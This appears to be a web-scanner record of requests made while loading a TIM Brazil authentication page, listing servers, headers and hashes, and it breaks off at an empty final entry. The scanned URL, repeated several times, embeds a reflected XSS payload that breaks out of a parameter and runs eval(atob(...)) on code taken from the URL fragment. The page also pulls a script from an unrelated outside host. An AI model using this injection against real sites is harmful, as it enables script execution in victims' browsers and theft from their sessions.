URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software
Apache /
Resource Hash
c28f024df8df9c3553efca35b134d3bde558f9e5f85a3b052d581bef81c47c90

Request headers

accept-language
en-US,en;q=0.9
Referer
http://auth3.tim.com.br/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

date
Mon, 29 Jan 2024 01:49:32 GMT
content-encoding
gzip
last-modified
Mon, 25 Nov 2019 18:36:55 GMT
server
Apache
x-cdn
Imperva
etag
"ee8ae-130-598300c411fc0"
content-type
application/javascript
x-iinfo
13-8388815-8388829 NNYN CT(116 609 0) RT(1706492971219 45) q(0 0 7 -1) r(9 9) U24
x-incap-sess-cookie-hdr
mSr3CTU2PGj+bcSXF9xUAiwEt2UAAAAA7qT4MIL6tWGCVdcJ8H3Gww==
accept-ranges
bytes
loading.gif
auth3.tim.com.br/OTP/imgs/ 		22 KB
23 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://auth3.tim.com.br/OTP/imgs/loading.gif
Requested by
Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software
Apache /
Resource Hash
3e75a6774ef7041083d556b2f83a816acdd398eff6add8c1867c0cea9ddf6d4b

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

date
Mon, 29 Jan 2024 01:49:32 GMT
last-modified
Wed, 31 Aug 2016 14:46:24 GMT
server
Apache
x-cdn
Imperva
etag
"42816-5992-53b5f2946f000"
content-type
image/gif
x-iinfo
13-8388815-8388835 PNNN RT(1706492971219 1186) q(0 0 0 1) r(1 1) U24
x-incap-sess-cookie-hdr
yxH4LMLY3nUCb8SXF9xUAiwEt2UAAAAAufx6beLT92tFDHSjG2vnSQ==
accept-ranges
bytes
content-length
22930
gtm.js
www.googletagmanager.com/ 		0
0 		Script
General
Check archive.org
Download Go to
Full URL
https://www.googletagmanager.com/gtm.js?id=GTM-XXXX
Requested by
Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2607:f8b0:4004:c1b::61 Washington, United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software
/
Resource Hash

Request headers

accept-language
en-US,en;q=0.9
Referer
http://auth3.tim.com.br/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers
header.aspx
wap.dindo.com.br/newMobile/auth/tim/ Frame 79C8 		0
0
temp.js
premtraf.pro/lion/222gdhj/ 		9 KB
4 KB 		Script
General
Check archive.org
Download Go to
Full URL
http://premtraf.pro/lion/222gdhj/temp.js
Requested by
Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
HTTP/1.1
Server
45.90.56.13 Geneva, Switzerland, ASN204957 (GREENFLOID-AS, US),
Reverse DNS
mon-fri.gg
Software
Apache/2.4.38 (Debian) /
Resource Hash
f05e67abbb4c8036ae631ee4fc5a99428d5bad75fd8996dfb01c09ec6ade3a1b

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

Date
Mon, 29 Jan 2024 01:49:33 GMT
Content-Encoding
gzip
Last-Modified
Tue, 19 Dec 2023 10:56:15 GMT
Server
Apache/2.4.38 (Debian)
ETag
"2599-60cdab7290029-gzip"
Vary
Accept-Encoding
Content-Type
application/javascript
Connection
Keep-Alive
Accept-Ranges
bytes
Keep-Alive
timeout=5, max=100
Content-Length
3248
timgameskids2-pt-doi-web
www.timpromos.com.br/OTA-BRTIM-BEMOBKIDS/ 		179 KB
46 KB 		XHR
General
Check archive.org
Download Go to
Full URL
http://www.timpromos.com.br/OTA-BRTIM-BEMOBKIDS/timgameskids2-pt-doi-web?HEKeyword=OTA_TGAMESKIDS_HAF_2&utm_source=haf&utm_medium=cpa&utm_content=timgameskids2&utm_campaign=OTA_TGAMESKIDS_HAF_2-haf-web-cpa-timgameskids2-image&haf_id=65b7042ab58a210348660d7d&haf_pub=344
Requested by
Host: auth3.tim.com.br
URL: https://auth3.tim.com.br/OTP/js/jquery.min.js
Protocol
HTTP/1.1
Server
91.241.94.8 , Greece, ASN49582 (UPSTREAM-AS Greece, GR),
Reverse DNS
Software
/
Resource Hash
d4e646539ef3bbac4e505327d7e625b4c4439997a0bc84a08989d8a3a41dedb4
Security Headers
Name Value
Strict-Transport-Security max-age=0; includeSubDomains

Request headers

Accept
*/*
Referer
accept-language
en-US,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

Date
Mon, 29 Jan 2024 01:49:34 GMT
Content-Encoding
gzip
Via
1.1 brtim1-varnish-5d85b7f48-6dnqh (Varnish/7.4)
Strict-Transport-Security
max-age=0; includeSubDomains
Age
0
Vary
Accept-Encoding
X-Cache
MISS
X-Varnish
225954962
Content-Type
text/html; charset=UTF-8
Access-Control-Allow-Origin
*
Cache-Control
no-cache, private
Transfer-Encoding
chunked
Connection
Keep-Alive
Accept-Ranges
bytes
Keep-Alive
timeout=5, max=1000
OTA-BRTIM-BEMOBKIDS-timgameskids2-pt-doi-web.css
auth3.tim.com.br/v3/accesscontrol-web/assets/ Frame 4E2B
Redirect Chain
  • http://auth3.tim.com.br/v3/accesscontrol-web/assets/OTA-BRTIM-BEMOBKIDS-timgameskids2-pt-doi-web.css?ver=45
  • https://auth3.tim.com.br/v3/accesscontrol-web/assets/OTA-BRTIM-BEMOBKIDS-timgameskids2-pt-doi-web.css?ver=45
0
0 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://auth3.tim.com.br/v3/accesscontrol-web/assets/OTA-BRTIM-BEMOBKIDS-timgameskids2-pt-doi-web.css?ver=45
Protocol
H2
Server
45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software
/
Resource Hash

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

Redirect headers

Date
Mon, 29 Jan 2024 01:49:35 GMT
Server
Apache
X-CDN
Imperva
Content-Type
text/html; charset=iso-8859-1
Location
https://auth3.tim.com.br/v3/accesscontrol-web/assets/OTA-BRTIM-BEMOBKIDS-timgameskids2-pt-doi-web.css?ver=45
X-Iinfo
14-9859630-9860578 NNNY CT(114 -1 0) RT(1706492970368 4959) q(0 0 0 -1) r(1 1) U24
Connection
Keep-Alive
Keep-Alive
timeout=4, max=800
Content-Length
292
gtm.js
www.googletagmanager.com/ 		212 KB
76 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://www.googletagmanager.com/gtm.js?id=GTM-MBV8MJ7
Requested by
Host: auth3.tim.com.br
URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2607:f8b0:4004:c1b::61 Washington, United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Google Tag Manager /
Resource Hash
aac2555412640904188450d33284dffe719157d0d317f5158f22de66054883f3
Security Headers
Name Value
Strict-Transport-Security max-age=31536000; includeSubDomains
X-Xss-Protection 0

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

date
Mon, 29 Jan 2024 01:49:35 GMT
content-encoding
br
strict-transport-security
max-age=31536000; includeSubDomains
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length
77103
x-xss-protection
0
last-modified
Mon, 29 Jan 2024 00:00:00 GMT
server
Google Tag Manager
vary
Accept-Encoding
content-type
application/javascript; charset=UTF-8
access-control-allow-origin
*
cache-control
private, max-age=900
access-control-allow-credentials
true
access-control-allow-headers
Cache-Control
expires
Mon, 29 Jan 2024 01:49:35 GMT
OTA-timgameskids2-logoHeader.png
auth3.tim.com.br/v3/accesscontrol-web/assets/images/Bemobi/ Frame 4E2B
Redirect Chain
  • http://auth3.tim.com.br/v3/accesscontrol-web/assets/images/Bemobi/OTA-timgameskids2-logoHeader.png
  • https://auth3.tim.com.br/v3/accesscontrol-web/assets/images/Bemobi/OTA-timgameskids2-logoHeader.png
0
0 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://auth3.tim.com.br/v3/accesscontrol-web/assets/images/Bemobi/OTA-timgameskids2-logoHeader.png
Protocol
H2
Server
45.60.63.22 , United States, ASN19551 (INCAPSULA, US),
Reverse DNS
Software
/
Resource Hash
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

Redirect headers

Date
Mon, 29 Jan 2024 01:49:35 GMT
Server
Apache
X-CDN
Imperva
Content-Type
text/html; charset=iso-8859-1
Location
https://auth3.tim.com.br/v3/accesscontrol-web/assets/images/Bemobi/OTA-timgameskids2-logoHeader.png
X-Iinfo
13-8389615-8389616 NNNY CT(109 -1 0) RT(1706492975390 0) q(0 0 0 -1) r(2 2) U24
Connection
Keep-Alive
Keep-Alive
timeout=4, max=1500
Content-Length
283
AQ4z3kkzQFIbAi8PnRY0OoNJi0wHxfmAAF5EX58aYQjoHHjnosSpDkoeS-f8LaVWs3a3
analytics-br-tim.securewebfraud.io/web/v1/content/view/Confirmation/br_tim/ Frame 4E2B 		51 B
332 B 		Image
General
Check archive.org
Download Go to Show image
Full URL
http://analytics-br-tim.securewebfraud.io/web/v1/content/view/Confirmation/br_tim/AQ4z3kkzQFIbAi8PnRY0OoNJi0wHxfmAAF5EX58aYQjoHHjnosSpDkoeS-f8LaVWs3a3
Protocol
HTTP/1.1
Server
91.220.208.18 -, , ASN (),
Reverse DNS
Software
/
Resource Hash
7455bacb03f7ef04d79010638db14d8434cf7a349914c2ee99eb5d4220338675

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

Pragma
no-cache
Date
Mon, 29 Jan 2024 01:49:36 GMT
Content-Type
image/gif
Cache-Control
no-store, private
Content-Disposition
attachment; filename="pixel"
Connection
Keep-Alive
Accept-Ranges
bytes
Keep-Alive
timeout=2, max=1000
Content-Length
51
AQ4z3kkzQFIbAi8PnRY0OoNJi0wHxfmAAF5EX58aYQjoHHjnosSpDkoeS-f8LaVWs3a3
www.timpromos.com.br/security-platform-web/web/v1/content/view/Confirmation/br_tim/ Frame 4E2B 		51 B
501 B 		Image
General
Check archive.org
Download Go to Show image
Full URL
http://www.timpromos.com.br/security-platform-web/web/v1/content/view/Confirmation/br_tim/AQ4z3kkzQFIbAi8PnRY0OoNJi0wHxfmAAF5EX58aYQjoHHjnosSpDkoeS-f8LaVWs3a3
Protocol
HTTP/1.1
Server
91.241.94.8 , Greece, ASN49582 (UPSTREAM-AS Greece, GR),
Reverse DNS
Software
/
Resource Hash
7455bacb03f7ef04d79010638db14d8434cf7a349914c2ee99eb5d4220338675

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

Pragma
no-cache
Date
Mon, 29 Jan 2024 01:49:36 GMT
Content-Type
image/gif
Cache-Control
no-store, private
Content-Disposition
attachment; filename="pixel"
Connection
Keep-Alive
Accept-Ranges
bytes
Keep-Alive
timeout=5, max=1000
Content-Length
51
destination
www.googletagmanager.com/gtag/ 		255 KB
87 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://www.googletagmanager.com/gtag/destination?id=G-9LLK8PEDTW&l=dataLayer&cx=c
Requested by
Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtm.js?id=GTM-MBV8MJ7
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
2607:f8b0:4004:c1b::61 Washington, United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Google Tag Manager /
Resource Hash
b3f86ed7a79081c9ceb28c435903bc6737f73331c7462759baab9640bd802acd
Security Headers
Name Value
Strict-Transport-Security max-age=31536000; includeSubDomains
X-Xss-Protection 0

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

date
Mon, 29 Jan 2024 01:49:36 GMT
content-encoding
br
strict-transport-security
max-age=31536000; includeSubDomains
server
Google Tag Manager
vary
Accept-Encoding
content-type
application/javascript; charset=UTF-8
access-control-allow-origin
*
cache-control
private, max-age=900
access-control-allow-credentials
true
cross-origin-resource-policy
cross-origin
access-control-allow-headers
Cache-Control
content-length
89172
x-xss-protection
0
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
expires
Mon, 29 Jan 2024 01:49:36 GMT
js
www.googletagmanager.com/gtag/ 		255 KB
87 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://www.googletagmanager.com/gtag/js?id=G-9LLK8PEDTW&l=dataLayer&cx=c
Requested by
Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtm.js?id=GTM-MBV8MJ7
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
2607:f8b0:4004:c1b::61 Washington, United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Google Tag Manager /
Resource Hash
5e64cc7782eeab8004d02bda9f320b268f12975560e5d85a6ab4bec78c6d5347
Security Headers
Name Value
Strict-Transport-Security max-age=31536000; includeSubDomains
X-Xss-Protection 0

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

date
Mon, 29 Jan 2024 01:49:36 GMT
content-encoding
br
strict-transport-security
max-age=31536000; includeSubDomains
server
Google Tag Manager
vary
Accept-Encoding
content-type
application/javascript; charset=UTF-8
access-control-allow-origin
*
cache-control
private, max-age=900
access-control-allow-credentials
true
cross-origin-resource-policy
cross-origin
access-control-allow-headers
Cache-Control
content-length
89068
x-xss-protection
0
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
expires
Mon, 29 Jan 2024 01:49:36 GMT
analytics.js
www.google-analytics.com/ 		52 KB
21 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://www.google-analytics.com/analytics.js
Requested by
Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtm.js?id=GTM-MBV8MJ7
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2607:f8b0:4004:c1b::71 Washington, United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Golfe2 /
Resource Hash
de36e50194320a7d3ef1ace9bd34a875a8bd458b253c061979dd628e9bf49afd
Security Headers
Name Value
Strict-Transport-Security max-age=10886400; includeSubDomains; preload
X-Content-Type-Options nosniff

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

strict-transport-security
max-age=10886400; includeSubDomains; preload
content-encoding
gzip
x-content-type-options
nosniff
date
Mon, 29 Jan 2024 00:50:09 GMT
last-modified
Tue, 12 Dec 2023 18:09:08 GMT
server
Golfe2
age
3567
vary
Accept-Encoding
content-type
text/javascript
cache-control
public, max-age=7200
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length
20994
expires
Mon, 29 Jan 2024 02:50:09 GMT
collect
analytics.google.com/g/ 		0
254 B 		Ping
General
Check archive.org
Download Go to
Full URL
https://analytics.google.com/g/collect?v=2&tid=G-9LLK8PEDTW&gtm=45je41o0v9100206336z8856739148&_p=1706492975795&_gaz=1&gcd=11l1l1l1l1&dma=0&cid=1378330578.1706492976&ul=en-us&sr=1600x1200&_s=1&sid=1706492976&sct=1&seg=0&dl=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading%3Fbmctx%3DD1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C%26contextType%3Dexternal%26username%3Dstring%26enablePersistentLogin%3Dtrue%26password%3Dsecure_string%26challenge_url%3Dhttp%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fheloading%26request_id%3D8407358969913691941%26authn_try_count%3D0%26locale%3Duk_UA%26resource_url%3Dhttps%25253A%25252F%25252Fauth3.tim.com.br%25252Fv3%25252Faccesscontrol-web%25252Fhe%25253Fclient_id%25253Db4da3e0624b94cbabb4d4c82b84b3012%252526csp%25253D751%252526appid%25253D11657%252526msisdn%25253D16982527516%252526redirect_uri%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252525252FNCN%252525252Fcallback%252525252Fpending%252526SecureSessionId%25253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%252526campaignReturnURL%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252522%25253E%2500%2500%2500%2500%2500%2500%2500%25253CScript%25253Eeval(atob(window.location.hash.substr(1)))%25253C%25252FScript%25253E%252525252FNCN%252525252Fredirect%252526paymentType%25253D2&dt=&en=OTA_TGames%20Kids_Wifi_Users&_fv=1&_nsi=1&_ss=1&tfd=5852
Requested by
Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtag/destination?id=G-9LLK8PEDTW&l=dataLayer&cx=c
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2001:4860:4802:38::181 , United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Golfe2 /
Resource Hash
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

pragma
no-cache
date
Mon, 29 Jan 2024 01:49:36 GMT
server
Golfe2
content-type
text/plain
access-control-allow-origin
http://auth3.tim.com.br
cache-control
no-cache, no-store, must-revalidate
access-control-allow-credentials
true
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length
0
expires
Fri, 01 Jan 1990 00:00:00 GMT
collect
stats.g.doubleclick.net/g/ 		0
245 B 		Ping
General
Check archive.org
Download Go to
Full URL
https://stats.g.doubleclick.net/g/collect?v=2&tid=G-9LLK8PEDTW&cid=1378330578.1706492976&gtm=45je41o0v9100206336z8856739148&aip=1&dma=0&gcd=11l1l1l1l1
Requested by
Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtag/destination?id=G-9LLK8PEDTW&l=dataLayer&cx=c
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2607:f8b0:4004:c08::9d Ashburn, United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Golfe2 /
Resource Hash
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

pragma
no-cache
date
Mon, 29 Jan 2024 01:49:36 GMT
server
Golfe2
content-type
text/plain
access-control-allow-origin
http://auth3.tim.com.br
cache-control
no-cache, no-store, must-revalidate
access-control-allow-credentials
true
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length
0
expires
Fri, 01 Jan 1990 00:00:00 GMT
collect
analytics.google.com/g/ 		0
54 B 		Ping
General
Check archive.org
Download Go to
Full URL
https://analytics.google.com/g/collect?v=2&tid=G-9LLK8PEDTW&gtm=45je41o0v9100206336z8856739148&_p=1706492975795&gcd=11l1l1l1l1&dma=0&cid=1378330578.1706492976&ul=en-us&sr=1600x1200&_s=2&sid=1706492976&sct=1&seg=1&dl=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading%3Fbmctx%3DD1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C%26contextType%3Dexternal%26username%3Dstring%26enablePersistentLogin%3Dtrue%26password%3Dsecure_string%26challenge_url%3Dhttp%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fheloading%26request_id%3D8407358969913691941%26authn_try_count%3D0%26locale%3Duk_UA%26resource_url%3Dhttps%25253A%25252F%25252Fauth3.tim.com.br%25252Fv3%25252Faccesscontrol-web%25252Fhe%25253Fclient_id%25253Db4da3e0624b94cbabb4d4c82b84b3012%252526csp%25253D751%252526appid%25253D11657%252526msisdn%25253D16982527516%252526redirect_uri%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252525252FNCN%252525252Fcallback%252525252Fpending%252526SecureSessionId%25253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%252526campaignReturnURL%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252522%25253E%2500%2500%2500%2500%2500%2500%2500%25253CScript%25253Eeval(atob(window.location.hash.substr(1)))%25253C%25252FScript%25253E%252525252FNCN%252525252Fredirect%252526paymentType%25253D2&dt=&en=page_view&_et=3&tfd=5868
Requested by
Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtag/destination?id=G-9LLK8PEDTW&l=dataLayer&cx=c
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2001:4860:4802:38::181 , United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Golfe2 /
Resource Hash
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

pragma
no-cache
date
Mon, 29 Jan 2024 01:49:36 GMT
server
Golfe2
content-type
text/plain
access-control-allow-origin
http://auth3.tim.com.br
cache-control
no-cache, no-store, must-revalidate
access-control-allow-credentials
true
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length
0
expires
Fri, 01 Jan 1990 00:00:00 GMT
collect
www.google-analytics.com/j/ 		3 B
208 B 		XHR
General
Check archive.org
Download Go to
Full URL
